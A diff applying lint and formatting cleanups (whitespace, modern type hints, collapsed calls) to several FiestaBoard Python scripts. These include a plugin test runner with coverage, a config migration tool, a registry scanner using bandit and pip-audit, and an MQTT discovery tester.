     # Create plugin instance with manifest
     plugin = SunArtPlugin(manifest)
-    
+
     # Configure plugin minimally (we won't use fetch_data)
     plugin._config = {
         "latitude": 37.7749,
@@ -241,62 +237,63 @@ def generate_stage_image(stage_name: str, output_path: Path):
         "refresh_seconds": 300,
     }
     plugin._enabled = True
-    
+
     # Directly call _generate_pattern with the stage name
     # This bypasses elevation calculation and uses the hardcoded patterns
     pattern_array = plugin._generate_pattern(stage_name, elevation=0)
-    
+
     if not pattern_array:
         print(f"  ERROR: No pattern generated for stage '{stage_name}'")
         return False
-    
+
     # Verify pattern dimensions
     if len(pattern_array) != 6 or any(len(row) != 22 for row in pattern_array):
         print(f"  ERROR: Invalid pattern dimensions for stage '{stage_name}'")
         return False
-    
+
     # Render the pattern with larger tiles for better quality
     img = render_pattern(pattern_array, tile_size=35, gap=3)
-    
+
     # Add padding around the board (matching web UI bezel style)
     padding = 30
     final_width = img.width + padding * 2
     final_height = img.height + padding * 2
-    
+
     # Create final image with dark bezel background (#050505 from web UI)
-    final_img = Image.new('RGB', (final_width, final_height), color=hex_to_rgb("#050505"))
+    final_img = Image.new("RGB", (final_width, final_height), color=hex_to_rgb("#050505"))
     final_img.paste(img, (padding, padding))
-    
+
     # Save image (no title - cleaner look matching web UI)
     final_img.save(output_path, "PNG", optimize=True)
     print(f"  Saved to {output_path}")
     return True
+
 
 def main():
     """Generate all stage images."""
     # Output directory
     docs_dir = project_root / "plugins" / "sun_art" / "docs"
     docs_dir.mkdir(parents=True, exist_ok=True)
-    
-    print(f"Generating Sun Art stage images...")
+
+    print("Generating Sun Art stage images...")
     print(f"Output directory: {docs_dir}")
     print(f"Total stages: {len(STAGES)}\n")
-    
+
     success_count = 0
-    for stage_name, description in STAGES:
+    for stage_name, _description in STAGES:
         output_path = docs_dir / f"sun-art-{stage_name.replace('_', '-')}.png"
         if generate_stage_image(stage_name, output_path):
             success_count += 1
         print()
-    
+
     print(f"Generated {success_count}/{len(STAGES)} images successfully")
-    
+
     if success_count == len(STAGES):
         print("\nAll images generated successfully!")
         return 0
-    else:
-        print("\nSome images failed to generate.")
-        return 1
+    print("\nSome images failed to generate.")
+    return 1
+
 
 if __name__ == "__main__":
     sys.exit(main())

--- a/scripts/migrate_config_to_plugins.py
+++ b/scripts/migrate_config_to_plugins.py
@@ -65,8 +65,8 @@ def load_config(config_path: Path) -> dict:
     if not config_path.exists():
         print(f"Error: Config file not found at {config_path}")
         sys.exit(1)
-    
-    with open(config_path, "r") as f:
+
+    with open(config_path) as f:
         return json.load(f)
 
 
@@ -89,126 +89,113 @@ def backup_config(config_path: Path) -> Path:
 def migrate_feature_to_plugin(feature_name: str, feature_config: dict) -> dict:
     """
     Migrate a feature configuration to plugin format.
-    
+
     Args:
         feature_name: The legacy feature name
         feature_config: The feature configuration dict
-        
+
     Returns:
         The migrated plugin configuration
     """
     plugin_config = {}
-    
+
     # Get field renames for this feature
     renames = FIELD_RENAMES.get(feature_name, {})
-    
+
     for key, value in feature_config.items():
         # Skip excluded fields
         if key in EXCLUDED_FIELDS:
             continue
-        
+
         # Apply any field renames
         new_key = renames.get(key, key)
         plugin_config[new_key] = value
-    
+
     return plugin_config
 
 
 def migrate_config(config: dict, dry_run: bool = False) -> dict:
     """
     Migrate legacy features to plugins section.
-    
+
     Args:
         config: The full config dict
         dry_run: If True, don't modify config, just report
-        
+
     Returns:
         The migrated config (or original if dry_run)
     """
     features = config.get("features", {})
     plugins = config.get("plugins", {})
-    
+
     migrated_count = 0
     skipped_count = 0
-    
+
     print("\n=== Migration Report ===\n")
-    
+
     for feature_name, plugin_id in FEATURE_TO_PLUGIN_MAP.items():
         if feature_name not in features:
             print(f"  [SKIP] {feature_name}: Not configured")
             skipped_count += 1
             continue
-        
+
         if plugin_id in plugins:
             print(f"  [SKIP] {feature_name} -> {plugin_id}: Already migrated")
             skipped_count += 1
             continue
-        
+
         feature_config = features[feature_name]
         plugin_config = migrate_feature_to_plugin(feature_name, feature_config)
-        
+
         # Show what will be migrated
         enabled = plugin_config.get("enabled", False)
         status = "ENABLED" if enabled else "disabled"
         print(f"  [MIGRATE] {feature_name} -> {plugin_id} ({status})")
-        
+
         if not dry_run:
             plugins[plugin_id] = plugin_config
-        
+
         migrated_count += 1
-    
-    print(f"\n=== Summary ===")
+
+    print("\n=== Summary ===")
     print(f"  Migrated: {migrated_count}")
     print(f"  Skipped:  {skipped_count}")
-    
+
     if dry_run:
         print("\n  [DRY RUN] No changes were made")
     else:
         config["plugins"] = plugins
         print("\n  Changes applied to config")
-    
+
     return config
 
 
 def main():
-    parser = argparse.ArgumentParser(
-        description="Migrate FiestaBoard config.json features to plugin format"
-    )
+    parser = argparse.ArgumentParser(description="Migrate FiestaBoard config.json features to plugin format")
     parser.add_argument(
-        "--config",
-        type=Path,
-        default=DEFAULT_CONFIG_PATH,
-        help=f"Path to config.json (default: {DEFAULT_CONFIG_PATH})"
+        "--config", type=Path, default=DEFAULT_CONFIG_PATH, help=f"Path to config.json (default: {DEFAULT_CONFIG_PATH})"
     )
-    parser.add_argument(
-        "--dry-run",
-        action="store_true",
-        help="Show what would be migrated without making changes"
-    )
-    parser.add_argument(
-        "--backup",
-        action="store_true",
-        help="Create a backup before migration"
-    )
-    
+    parser.add_argument("--dry-run", action="store_true", help="Show what would be migrated without making changes")
+    parser.add_argument("--backup", action="store_true", help="Create a backup before migration")
+
     args = parser.parse_args()
-    
-    print(f"FiestaBoard Config Migration Script")
-    print(f"=" * 40)
+
+    print("FiestaBoard Config Migration Script")
+    print("=" * 40)
     print(f"Config: {args.config}")
     print(f"Dry run: {args.dry_run}")
     print(f"Backup: {args.backup}")
-    
+
     # Load config
     config = load_config(args.config)
-    
+
     # Create backup if requested
     if args.backup and not args.dry_run:
         backup_config(args.config)
-    
+
     # Run migration
     migrated_config = migrate_config(config, dry_run=args.dry_run)
-    
+
     # Save if not dry run
     if not args.dry_run:
         save_config(args.config, migrated_config)
@@ -220,4 +207,3 @@ def main():
 
 if __name__ == "__main__":
     main()
-

--- a/scripts/run_plugin_tests.py
+++ b/scripts/run_plugin_tests.py
@@ -22,12 +22,9 @@ Exit codes:
 """
 
 import argparse
-import json
-import os
 import subprocess
 import sys
 from pathlib import Path
-from typing import Dict, List, Optional, Tuple
 
 # Project paths
 SCRIPT_DIR = Path(__file__).parent
@@ -43,7 +40,7 @@ SKIP_DIRECTORIES = {"_template", "__pycache__"}
 
 class PluginTestResult:
     """Result of running tests for a single plugin."""
-    
+
     def __init__(
         self,
         plugin_id: str,
@@ -51,7 +48,7 @@ class PluginTestResult:
         coverage: float,
         tests_run: int = 0,
         tests_failed: int = 0,
-        error: Optional[str] = None
+        error: str | None = None,
     ):
         self.plugin_id = plugin_id
         self.passed = passed
@@ -59,37 +56,37 @@ class PluginTestResult:
         self.tests_run = tests_run
         self.tests_failed = tests_failed
         self.error = error
-    
+
     @property
     def coverage_warning(self) -> bool:
         """Check if coverage is below warning threshold."""
         return self.coverage < WARNING_THRESHOLD
-    
+
     def __str__(self):
         status = "PASS" if self.passed else "FAIL"
         warning = " (!)" if self.coverage_warning else ""
         return f"{self.plugin_id}: {status} (coverage: {self.coverage:.1f}%){warning}"
 
 
-def discover_plugins() -> List[Path]:
+def discover_plugins() -> list[Path]:
     """Discover all plugin directories with tests.
-    
+
     Returns:
         List of paths to plugin directories that have tests/ subdirectory
     """
     plugins = []
-    
+
     if not PLUGINS_DIR.exists():
         print(f"Warning: Plugins directory not found: {PLUGINS_DIR}")
         return plugins
-    
+
     for item in PLUGINS_DIR.iterdir():
         if not item.is_dir():
             continue
-        
+
         if item.name in SKIP_DIRECTORIES:
             continue
-        
+
         # Check for tests directory
         tests_dir = item / "tests"
         if tests_dir.exists() and tests_dir.is_dir():
@@ -97,58 +94,57 @@ def discover_plugins() -> List[Path]:
             test_files = list(tests_dir.glob("test_*.py"))
             if test_files:
                 plugins.append(item)
-    
+
     return sorted(plugins, key=lambda p: p.name)
 
 
-def run_plugin_tests(
-    plugin_dir: Path,
-    verbose: bool = False
-) -> PluginTestResult:
+def run_plugin_tests(plugin_dir: Path, verbose: bool = False) -> PluginTestResult:
     """Run tests for a single plugin with coverage.
-    
+
     Args:
         plugin_dir: Path to the plugin directory
         fail_under: Minimum coverage percentage
         verbose: Show detailed output
-        
+
     Returns:
         PluginTestResult with test and coverage information
     """
     plugin_id = plugin_dir.name
     tests_dir = plugin_dir / "tests"
-    
+
     # Build coverage + pytest command
     # Use absolute path to plugin directory to ensure it works in CI
     plugin_abs_path = str(plugin_dir.resolve())
     coverage_file = PROJECT_ROOT / f".coverage.{plugin_id}"
-    
+
     test_cmd = [
-        sys.executable, "-m", "coverage", "run",
-        f"--data-file={str(coverage_file)}",
+        sys.executable,
+        "-m",
+        "coverage",
+        "run",
+        f"--data-file={coverage_file!s}",
         f"--source={plugin_abs_path}",  # Absolute path to plugin directory
-        "-m", "pytest",
+        "-m",
+        "pytest",
         str(tests_dir),
         "-v" if verbose else "-q",
     ]
-    
+
     # Build coverage report command (no fail-under to allow tests to pass)
     report_cmd = [
-        sys.executable, "-m", "coverage", "report",
-        f"--data-file={str(coverage_file)}",
+        sys.executable,
+        "-m",
+        "coverage",
+        "report",
+        f"--data-file={coverage_file!s}",
         f"--include={plugin_abs_path}/*",  # Include only this plugin's files (absolute path)
         "--show-missing",  # Show which lines are missing for debugging
     ]
-    
+
     try:
         # Run tests with coverage
-        test_result = subprocess.run(
-            test_cmd,
-            capture_output=True,
-            text=True,
-            cwd=str(PROJECT_ROOT)
-        )
-        
+        test_result = subprocess.run(test_cmd, capture_output=True, text=True, cwd=str(PROJECT_ROOT))
+
         # Check if coverage file was created
         if not coverage_file.exists():
             error_msg = f"Coverage data file not created: {coverage_file}"
@@ -162,17 +158,12 @@ def run_plugin_tests(
                 coverage=0.0,
                 tests_run=parse_test_results(test_result.stdout + test_result.stderr)[0],
                 tests_failed=parse_test_results(test_result.stdout + test_result.stderr)[1],
-                error=error_msg
+                error=error_msg,
             )
-        
+
         # Generate coverage report
-        report_result = subprocess.run(
-            report_cmd,
-            capture_output=True,
-            text=True,
-            cwd=str(PROJECT_ROOT)
-        )
-        
+        report_result = subprocess.run(report_cmd, capture_output=True, text=True, cwd=str(PROJECT_ROOT))
+
         # Always show stderr if there are errors (helps debug CI issues)
         if report_result.returncode != 0 or verbose:
             if test_result.stderr:
@@ -182,104 +173,98 @@ def run_plugin_tests(
             if verbose:
                 print(f"[{plugin_id}] Test stdout:", test_result.stdout)
                 print(f"[{plugin_id}] Coverage stdout:", report_result.stdout)
-        
+
         # Parse output for coverage percentage
         full_output = report_result.stdout + report_result.stderr
         coverage = parse_coverage_from_output(full_output)
-        
+
         # If coverage parsing failed, try to get it from test output (pytest-cov format)
         if coverage == 0.0:
             coverage = parse_coverage_from_output(test_result.stdout + test_result.stderr)
-        
+
         # Parse test results
         tests_run, tests_failed = parse_test_results(test_result.stdout + test_result.stderr)
-        
+
         # Tests pass if pytest succeeded AND coverage meets threshold
         passed = test_result.returncode == 0 and coverage >= DEFAULT_FAIL_UNDER
-        
+
         if coverage < DEFAULT_FAIL_UNDER:
-            print(f"❌ FAIL: {plugin_id} coverage ({coverage:.1f}%) is below minimum threshold ({DEFAULT_FAIL_UNDER}%)", file=sys.stderr)
-        
+            print(
+                f"❌ FAIL: {plugin_id} coverage ({coverage:.1f}%) is below minimum threshold ({DEFAULT_FAIL_UNDER}%)",
+                file=sys.stderr,
+            )
+
         return PluginTestResult(
-            plugin_id=plugin_id,
-            passed=passed,
-            coverage=coverage,
-            tests_run=tests_run,
-            tests_failed=tests_failed
+            plugin_id=plugin_id, passed=passed, coverage=coverage, tests_run=tests_run, tests_failed=tests_failed
         )
-        
+
     except Exception as e:
-        return PluginTestResult(
-            plugin_id=plugin_id,
-            passed=False,
-            coverage=0.0,
-            error=str(e)
-        )
+        return PluginTestResult(plugin_id=plugin_id, passed=False, coverage=0.0, error=str(e))
 
 
 def parse_coverage_from_output(output: str) -> float:
     """Parse coverage percentage from coverage report output.
-    
+
     Args:
         output: Combined stdout/stderr from coverage report
-        
+
     Returns:
         Coverage percentage (0-100)
     """
     import re
-    
+
     # Look for TOTAL line with branch coverage: "TOTAL    stmts    miss    branch    brpart    cover%"
     # Format: TOTAL <stmts> <miss> <branch> <brpart> <cover>%
     total_pattern = r"TOTAL\s+\d+\s+\d+\s+\d+\s+\d+\s+(\d+(?:\.\d+)?)%"
     match = re.search(total_pattern, output)
     if match:
         return float(match.group(1))
-    
+
     # Fallback: Look for TOTAL line without branch coverage: "TOTAL    xxx    xxx    xx%"
     total_pattern_simple = r"TOTAL\s+\d+\s+\d+\s+(\d+(?:\.\d+)?)%"
     match = re.search(total_pattern_simple, output)
     if match:
         return float(match.group(1))
-    
+
     # Alternative pattern: "Coverage: xx%"
     coverage_pattern = r"Coverage:\s*(\d+(?:\.\d+)?)%"
     match = re.search(coverage_pattern, output)
     if match:
         return float(match.group(1))
-    
+
     return 0.0
 
 
-def parse_test_results(output: str) -> Tuple[int, int]:
+def parse_test_results(output: str) -> tuple[int, int]:
     """Parse test count from pytest output.
-    
+
     Args:
         output: Combined stdout/stderr from pytest
-        
+
     Returns:
         Tuple of (tests_run, tests_failed)
     """
     import re
-    
+
     # Pattern: "X passed" or "X passed, Y failed"
     passed_pattern = r"(\d+) passed"
     failed_pattern = r"(\d+) failed"
-    
+
     passed_match = re.search(passed_pattern, output)
     failed_match = re.search(failed_pattern, output)
-    
+
     passed = int(passed_match.group(1)) if passed_match else 0
     failed = int(failed_match.group(1)) if failed_match else 0
-    
+
     return (passed + failed, failed)
 
 
-def generate_coverage_report(results: List[PluginTestResult]) -> str:
+def generate_coverage_report(results: list[PluginTestResult]) -> str:
     """Generate a summary report of plugin coverage.
-    
+
     Args:
         results: List of plugin test results
-        
+
     Returns:
         Formatted report string
     """
@@ -288,159 +273,136 @@ def generate_coverage_report(results: List[PluginTestResult]) -> str:
     lines.append("PLUGIN TEST COVERAGE REPORT")
     lines.append("=" * 60)
     lines.append("")
-    
+
     # Header
     lines.append(f"{'Plugin':<25} {'Tests':<10} {'Coverage':<12} {'Status':<10}")
     lines.append("-" * 60)
-    
+
     all_passed = True
     total_tests = 0
     low_coverage_plugins = []
-    
+
     for result in results:
         status = "PASS" if result.passed else "FAIL"
         if status == "FAIL":
             all_passed = False
-        
+
         total_tests += result.tests_run
-        
+
         coverage_str = f"{result.coverage:.1f}%"
         if result.coverage_warning:
             coverage_str += " (!)"
             low_coverage_plugins.append(result.plugin_id)
-        
-        lines.append(
-            f"{result.plugin_id:<25} {result.tests_run:<10} {coverage_str:<12} {status:<10}"
-        )
-        
+
+        lines.append(f"{result.plugin_id:<25} {result.tests_run:<10} {coverage_str:<12} {status:<10}")
+
         if result.error:
             lines.append(f"  Error: {result.error}")
-    
+
     lines.append("-" * 60)
-    
+
     # Summary
     passed_count = sum(1 for r in results if r.passed)
     lines.append(f"Total: {len(results)} plugins, {total_tests} tests")
     lines.append(f"Passed: {passed_count}/{len(results)} plugins")
     lines.append("")
-    
+
     if all_passed:
         lines.append("All plugins passed tests.")
         if low_coverage_plugins:
             lines.append("")
             lines.append(f"⚠️  WARNING: {len(low_coverage_plugins)} plugin(s) have coverage below {WARNING_THRESHOLD}%:")
             lines.append(f"   {', '.join(low_coverage_plugins)}")
-            lines.append(f"   See GitHub issue #64 for improvement plan.")
+            lines.append("   See GitHub issue #64 for improvement plan.")
     else:
         lines.append("Some plugins failed tests.")
         if low_coverage_plugins:
             lines.append("")
             lines.append(f"⚠️  WARNING: {len(low_coverage_plugins)} plugin(s) have coverage below {WARNING_THRESHOLD}%:")
             lines.append(f"   {', '.join(low_coverage_plugins)}")
-            lines.append(f"   See GitHub issue #64 for improvement plan.")
-    
+            lines.append("   See GitHub issue #64 for improvement plan.")
+
     lines.append("")
     lines.append("Plugins marked with (!) have coverage below warning threshold.")
     lines.append("=" * 60)
-    
+
     return "\n".join(lines)
 
 
 def main():
-    parser = argparse.ArgumentParser(
-        description="Run FiestaBoard plugin tests with coverage reporting"
-    )
-    parser.add_argument(
-        "--plugin",
-        type=str,
-        help="Run tests for specific plugin only"
-    )
-    parser.add_argument(
-        "--verbose", "-v",
-        action="store_true",
-        help="Show detailed output"
-    )
-    parser.add_argument(
-        "--dry-run",
-        action="store_true",
-        help="Show what would be run without executing"
-    )
-    parser.add_argument(
-        "--no-coverage",
-        action="store_true",
-        help="Run tests without coverage checking"
-    )
-    parser.add_argument(
-        "--report",
-        action="store_true",
-        help="Generate HTML coverage report"
-    )
-    
+    parser = argparse.ArgumentParser(description="Run FiestaBoard plugin tests with coverage reporting")
+    parser.add_argument("--plugin", type=str, help="Run tests for specific plugin only")
+    parser.add_argument("--verbose", "-v", action="store_true", help="Show detailed output")
+    parser.add_argument("--dry-run", action="store_true", help="Show what would be run without executing")
+    parser.add_argument("--no-coverage", action="store_true", help="Run tests without coverage checking")
+    parser.add_argument("--report", action="store_true", help="Generate HTML coverage report")
+
     args = parser.parse_args()
-    
+
     print("FiestaBoard Plugin Test Runner")
     print(f"Coverage threshold: {DEFAULT_FAIL_UNDER}% (plugins must meet this to pass)")
     print()
-    
+
     # Discover plugins
     plugins = discover_plugins()
-    
+
     if args.plugin:
         # Filter to specific plugin
         plugins = [p for p in plugins if p.name == args.plugin]
         if not plugins:
             print(f"Error: Plugin '{args.plugin}' not found or has no tests")
             sys.exit(2)
-    
+
     if not plugins:
         print("No plugins with tests found.")
         print(f"Plugins directory: {PLUGINS_DIR}")
         print("Ensure plugins have a tests/ directory with test_*.py files")
         sys.exit(2)
-    
+
     print(f"Found {len(plugins)} plugin(s) with tests:")
     for p in plugins:
         test_count = len(list((p / "tests").glob("test_*.py")))
         print(f"  - {p.name} ({test_count} test file(s))")
     print()
-    
+
     if args.dry_run:
         print("Dry run - no tests executed")
         sys.exit(0)
-    
+
     # Run tests for each plugin
-    results: List[PluginTestResult] = []
-    
+    results: list[PluginTestResult] = []
+
     for plugin_dir in plugins:
         print(f"Testing plugin: {plugin_dir.name}")
         print("-" * 40)
-        
+
         if args.no_coverage:
             # Run without coverage
             cmd = [
-                sys.executable, "-m", "pytest",
+                sys.executable,
+                "-m",
+                "pytest",
                 str(plugin_dir / "tests"),
                 "-v" if args.verbose else "-q",
             ]
             result = subprocess.run(cmd, cwd=str(PROJECT_ROOT))
-            results.append(PluginTestResult(
-                plugin_id=plugin_dir.name,
-                passed=result.returncode == 0,
-                coverage=100.0  # Skip coverage check
-            ))
-        else:
-            result = run_plugin_tests(
-                plugin_dir,
-                verbose=args.verbose
+            results.append(
+                PluginTestResult(
+                    plugin_id=plugin_dir.name,
+                    passed=result.returncode == 0,
+                    coverage=100.0,  # Skip coverage check
+                )
             )
+        else:
+            result = run_plugin_tests(plugin_dir, verbose=args.verbose)
             results.append(result)
-        
+
         print()
-    
+
     # Generate report
     report = generate_coverage_report(results)
     print(report)
-    
+
     # Generate HTML report if requested
     if args.report:
         COVERAGE_DIR.mkdir(exist_ok=True)
@@ -448,10 +410,10 @@ def main():
         with open(report_path, "w") as f:
             f.write(report)
         print(f"\nReport saved to: {report_path}")
-    
+
     # Determine exit code (only based on test results, not coverage)
     all_passed = all(r.passed for r in results)
-    
+
     if all_passed:
         print("\nAll plugin tests passed.")
         sys.exit(0)
@@ -463,4 +425,3 @@ def main():
 
 if __name__ == "__main__":
     main()
-

--- a/scripts/scan_registry.py
+++ b/scripts/scan_registry.py
@@ -26,9 +26,8 @@ import shutil
 import subprocess
 import sys
 import tempfile
-from datetime import datetime, timezone
+from datetime import UTC, datetime
 from pathlib import Path
-from typing import Dict, List, Optional
 
 # Project paths
 SCRIPT_DIR = Path(__file__).parent
@@ -43,9 +42,9 @@ class PluginScanResult:
         self.plugin_id = plugin_id
         self.name = name
         self.repository = repository
-        self.bandit_findings: List[Dict] = []
-        self.dependency_findings: List[Dict] = []
-        self.clone_error: Optional[str] = None
+        self.bandit_findings: list[dict] = []
+        self.dependency_findings: list[dict] = []
+        self.clone_error: str | None = None
 
     @property
     def has_findings(self) -> bool:
@@ -56,14 +55,14 @@ class PluginScanResult:
         return self.clone_error is not None
 
 
-def load_registry() -> List[Dict]:
+def load_registry() -> list[dict]:
     """Load plugin registry and return list of plugin entries."""
     if not REGISTRY_FILE.exists():
         print(f"Error: Registry file not found: {REGISTRY_FILE}")
         sys.exit(2)
 
     try:
-        with open(REGISTRY_FILE, "r", encoding="utf-8") as f:
+        with open(REGISTRY_FILE, encoding="utf-8") as f:
             data = json.load(f)
     except json.JSONDecodeError as exc:
         print(f"Error: Invalid JSON in registry file: {exc}")
@@ -77,7 +76,7 @@ def load_registry() -> List[Dict]:
     return plugins
 
 
-def clone_repo(repo_url: str, target_dir: str, verbose: bool) -> Optional[str]:
+def clone_repo(repo_url: str, target_dir: str, verbose: bool) -> str | None:
     """Shallow-clone a repository. Returns error message or None on success."""
     # Validate the URL from the registry JSON before passing to subprocess
     # (py/command-line-injection). Only HTTPS URLs are permitted; re-derive
@@ -107,13 +106,13 @@ def clone_repo(repo_url: str, target_dir: str, verbose: bool) -> Optional[str]:
         return f"git clone error: {exc}"
 
 
-def run_bandit(plugin_dir: str, verbose: bool) -> List[Dict]:
+def run_bandit(plugin_dir: str, verbose: bool) -> list[dict]:
     """Run bandit SAST scan on a plugin directory.
 
     Uses ``-ll`` to report only medium-severity and above findings.
     Returns a list of finding dicts.
     """
-    findings: List[Dict] = []
+    findings: list[dict] = []
     try:
         result = subprocess.run(
             ["bandit", "-r", plugin_dir, "-f", "json", "-q", "-ll"],
@@ -152,12 +151,12 @@ def run_bandit(plugin_dir: str, verbose: bool) -> List[Dict]:
     return findings
 
 
-def run_pip_audit(requirements_path: str, verbose: bool) -> List[Dict]:
+def run_pip_audit(requirements_path: str, verbose: bool) -> list[dict]:
     """Run pip-audit against a requirements file.
 
     Returns a list of finding dicts for each known vulnerability.
     """
-    findings: List[Dict] = []
+    findings: list[dict] = []
     try:
         result = subprocess.run(
             [
@@ -184,17 +183,12 @@ def run_pip_audit(requirements_path: str, verbose: bool) -> List[Dict]:
                                 "version": dep.get("version", ""),
                                 "vuln_id": vuln.get("id", ""),
                                 "fix_versions": vuln.get("fix_versions", []),
-                                "description": (
-                                    vuln.get("description", "See advisory")[:200]
-                                ),
+                                "description": (vuln.get("description", "See advisory")[:200]),
                             }
                         )
             except json.JSONDecodeError:
                 if verbose:
-                    print(
-                        f"  Warning: pip-audit produced non-JSON output "
-                        f"for {requirements_path}"
-                    )
+                    print(f"  Warning: pip-audit produced non-JSON output for {requirements_path}")
     except subprocess.TimeoutExpired:
         if verbose:
             print(f"  Warning: pip-audit timed out for {requirements_path}")
@@ -205,7 +199,7 @@ def run_pip_audit(requirements_path: str, verbose: bool) -> List[Dict]:
     return findings
 
 
-def scan_plugin(entry: Dict, workspace: str, verbose: bool) -> PluginScanResult:
+def scan_plugin(entry: dict, workspace: str, verbose: bool) -> PluginScanResult:
     """Clone and scan a single plugin repository."""
     plugin_id = entry.get("id", "unknown")
     name = entry.get("name", plugin_id)
@@ -250,9 +244,9 @@ def scan_plugin(entry: Dict, workspace: str, verbose: bool) -> PluginScanResult:
     return result
 
 
-def generate_report(results: List[PluginScanResult]) -> str:
+def generate_report(results: list[PluginScanResult]) -> str:
     """Generate a markdown report from scan results."""
-    scan_date = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+    scan_date = datetime.now(UTC).strftime("%Y-%m-%dT%H:%M:%SZ")
 
     lines = [
         "# Plugin Registry Security Scan Results",
@@ -264,9 +258,7 @@ def generate_report(results: List[PluginScanResult]) -> str:
 
     plugins_with_findings = [r for r in results if r.has_findings]
     plugins_with_errors = [r for r in results if r.has_errors]
-    plugins_clean = [
-        r for r in results if not r.has_findings and not r.has_errors
-    ]
+    plugins_clean = [r for r in results if not r.has_findings and not r.has_errors]
 
     total_bandit = sum(len(r.bandit_findings) for r in results)
     total_deps = sum(len(r.dependency_findings) for r in results)
@@ -317,15 +309,8 @@ def generate_report(results: List[PluginScanResult]) -> str:
             lines.append("### Dependency Vulnerabilities (pip-audit)")
             lines.append("")
             for finding in result.dependency_findings:
-                fix = (
-                    ", ".join(finding["fix_versions"])
-                    if finding.get("fix_versions")
-                    else "No fix available"
-                )
-                lines.append(
-                    f"- **{finding['package']}=={finding['version']}**: "
-                    f"{finding['vuln_id']} (fix: {fix})"
-                )
+                fix = ", ".join(finding["fix_versions"]) if finding.get("fix_versions") else "No fix available"
+                lines.append(f"- **{finding['package']}=={finding['version']}**: {finding['vuln_id']} (fix: {fix})")
             lines.append("")
 
     # Clean plugins
@@ -340,9 +325,7 @@ def generate_report(results: List[PluginScanResult]) -> str:
 
 
 def main():
-    parser = argparse.ArgumentParser(
-        description="Scan FiestaBoard plugin registry repositories for vulnerabilities"
-    )
+    parser = argparse.ArgumentParser(description="Scan FiestaBoard plugin registry repositories for vulnerabilities")
     parser.add_argument(
         "--verbose",
         "-v",
@@ -374,7 +357,7 @@ def main():
 
     try:
         # Scan each plugin
-        results: List[PluginScanResult] = []
+        results: list[PluginScanResult] = []
         for i, entry in enumerate(plugins, 1):
             plugin_id = entry.get("id", "unknown")
             name = entry.get("name", plugin_id)
@@ -386,9 +369,7 @@ def main():
             if result.clone_error:
                 print(f"  ❌ Clone failed: {result.clone_error}")
             elif result.has_findings:
-                total = len(result.bandit_findings) + len(
-                    result.dependency_findings
-                )
+                total = len(result.bandit_findings) + len(result.dependency_findings)
                 print(f"  ⚠️  {total} finding(s)")
             else:
                 print("  ✅ Clean")
@@ -410,10 +391,7 @@ def main():
 
         has_vulnerabilities = any(r.has_findings for r in results)
         plugins_with_findings = sum(1 for r in results if r.has_findings)
-        total_findings = sum(
-            len(r.bandit_findings) + len(r.dependency_findings)
-            for r in results
-        )
+        total_findings = sum(len(r.bandit_findings) + len(r.dependency_findings) for r in results)
 
         print(f"Plugins scanned: {len(results)}")
         print(f"Plugins with findings: {plugins_with_findings}")
@@ -424,10 +402,7 @@ def main():
         github_output = os.environ.get("GITHUB_OUTPUT")
         if github_output:
             with open(github_output, "a", encoding="utf-8") as f:
-                f.write(
-                    f"has_vulnerabilities="
-                    f"{'true' if has_vulnerabilities else 'false'}\n"
-                )
+                f.write(f"has_vulnerabilities={'true' if has_vulnerabilities else 'false'}\n")
                 f.write(f"plugin_count={len(results)}\n")
                 f.write(f"finding_count={total_findings}\n")
 

--- a/scripts/seed_screenshot_data.py
+++ b/scripts/seed_screenshot_data.py
@@ -6,11 +6,11 @@ Usage: python3 scripts/seed_screenshot_data.py [--reset]
   --reset  Remove all seeded data and restore to defaults
 """
 
-import sys
 import json
-import urllib.request
-import urllib.error
+import sys
 import time
+import urllib.error
+import urllib.request
 
 BASE_URL = "http://localhost:4420/api"
 

--- a/scripts/test_mqtt_discovery.py
+++ b/scripts/test_mqtt_discovery.py
@@ -15,20 +15,20 @@ and DISCONNECT.
 
 import argparse
 import json
+import os
 import socket
 import struct
 import sys
-import os
 
 sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
 
 from src.mqtt.config import MQTTConfig
 from src.mqtt.discovery import build_all_discovery_messages
 
-
 # ---------------------------------------------------------------------------
 # Minimal MQTT 3.1.1 helpers (only what we need: CONNECT, PUBLISH, DISCONNECT)
 # ---------------------------------------------------------------------------
+
 
 def _encode_utf8(s: str) -> bytes:
     encoded = s.encode("utf-8")
@@ -50,10 +50,10 @@ def _encode_remaining_length(length: int) -> bytes:
 
 def _make_connect(client_id: str = "fiestaboard-test") -> bytes:
     variable = (
-        _encode_utf8("MQTT")           # Protocol name
-        + struct.pack("!B", 4)         # Protocol level 4 = MQTT 3.1.1
-        + struct.pack("!B", 0x02)      # Connect flags: clean session
-        + struct.pack("!H", 60)        # Keep alive 60s
+        _encode_utf8("MQTT")  # Protocol name
+        + struct.pack("!B", 4)  # Protocol level 4 = MQTT 3.1.1
+        + struct.pack("!B", 0x02)  # Connect flags: clean session
+        + struct.pack("!H", 60)  # Keep alive 60s
     )
     payload = _encode_utf8(client_id)
     remaining = variable + payload

--- a/scripts/validate_plugins.py
+++ b/scripts/validate_plugins.py
@@ -30,7 +30,6 @@ import re
 import subprocess
 import sys
 from pathlib import Path
-from typing import Dict, List, Optional, Tuple
 
 # Project paths
 SCRIPT_DIR = Path(__file__).parent
@@ -43,38 +42,38 @@ SKIP_DIRECTORIES = {"_template", "__pycache__"}
 
 class ValidationResult:
     """Result of validating a single plugin."""
-    
+
     def __init__(self, plugin_id: str):
         self.plugin_id = plugin_id
-        self.errors: List[str] = []
-        self.warnings: List[str] = []
-    
+        self.errors: list[str] = []
+        self.warnings: list[str] = []
+
     @property
     def is_valid(self) -> bool:
         return len(self.errors) == 0
-    
+
     def add_error(self, message: str):
         self.errors.append(message)
-    
+
     def add_warning(self, message: str):
         self.warnings.append(message)
-    
+
     def __str__(self):
         status = "PASS" if self.is_valid else "FAIL"
         return f"{self.plugin_id}: {status}"
 
 
-def discover_plugin_directories() -> List[Path]:
+def discover_plugin_directories() -> list[Path]:
     """Discover all plugin directories.
-    
+
     Returns:
         List of paths to plugin directories
     """
     plugins = []
-    
+
     if not PLUGINS_DIR.exists():
         return plugins
-    
+
     for item in PLUGINS_DIR.iterdir():
         if not item.is_dir():
             continue
@@ -83,23 +82,23 @@ def discover_plugin_directories() -> List[Path]:
         if item.name.startswith("."):
             continue
         plugins.append(item)
-    
+
     return sorted(plugins, key=lambda p: p.name)
 
 
-def load_manifest(plugin_dir: Path) -> Tuple[Optional[Dict], Optional[str]]:
+def load_manifest(plugin_dir: Path) -> tuple[dict | None, str | None]:
     """Load a plugin's manifest.json.
-    
+
     Returns:
